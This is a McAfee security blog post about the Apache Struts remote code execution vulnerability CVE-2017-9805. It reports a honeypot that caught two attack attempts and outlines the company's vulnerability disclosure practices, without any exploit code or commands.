McAfee Demos Ease of Exploiting Recent Apache Struts Vulnerability

By on

This post was written by Brook Schoenfield and the Advanced Threat Research Team.

A series of exploitable conditions have been uncovered in Apache Struts. One of these, CVE-2017-9805, allows unauthenticated execution of attacker code (aka remote code execution). This issue has already been weaponized into attack kits such as Metasploit and exploitation has been seen “in the wild”; that is, attackers are attempting to take advantage of the flaw.

Apache Struts is a popular open-source component that is used in numerous websites across the Internet, which makes a remote code execution vulnerability very concerning. Speculation is widespread about this issue’s exploitation.

CVE-2017-9805 describes a vulnerability in Apache Struts 2.5.12 that could be subject to a malware attack or other vector of attack designed to take advantage of the vulnerability. To our knowledge, Apache Struts 2.5.12 is not used in McAfee enterprise products as delivered by McAfee.

To demonstrate how easy it is to exploit the vulnerability, we created a little demo in which we take ownership of a vulnerable system. You can watch the video here.

To have an indication of the volume of attacks, the Advanced Threat Research (ATR) team set up a “honeypot” system to attract attack attempts. After less than two hours online, the ATR honeypot system recorded two attacks. One of the attackers attempted to run the Windows command line (cmd.exe) on our Linux box; the other attacker attempted to create a reverse shell toward his machine. If that had been successful, he could have gained full control of our system. Of course, our honeypot setup does not allow a compromise.

McAfee handles reported vulnerabilities in accordance with our product security practices. McAfee adheres to international product incident practices, including CVSS Version 3.0 calculation and CVE assignment.

McAfee actively encourages customer engagement and welcomes specific requests for clarification about our software security process.  There are some things we do not disclose, such as lists of vulnerabilities found through internal investigations or automated testing tools.

For external communications, we publish a security bulletin to all customers of an affected McAfee product as soon as McAfee’s security vulnerability team has confirmed that the vulnerability is critical, and after McAfee has determined appropriate mitigation for the vulnerability. (“Critical” means greater than or equal to CVSS 8.5.) The bulletin may address mitigations, workarounds, and updates. Please see McAfee’s Product Security Bulletins for more information.

Leave a Comment

Similar articles

FaceTime is a popular way for people of all ages to connect with long-distance loved ones. The feature permits Apple users to video chat with other device owners from essentially anywhere at any time. And now, a bug in the software takes that connection a step further – as it permits users calling via FaceTime ...
Read Blog
As the cybersecurity landscape evolves to match new trends in technology, it’s important for consumers to prioritize the protection of their online presence. That means remaining aware of the internet’s more common cyberthreats, including malware, phishing, and data breaches, and how they could potentially affect you. And while most of us already know about the ...
Read Blog
Epic Games’ Fortnite has risen in popularity rapidly since its debut, and cybercriminals have leveraged that popularity to enact a handful of malicious schemes. Unfortunately, these tricks are showing no signs of slowing, as researchers recently discovered a security flaw that allowed cybercriminals to take over a gamer’s Fortnite account through a malicious link. This attack specifically ...
Read Blog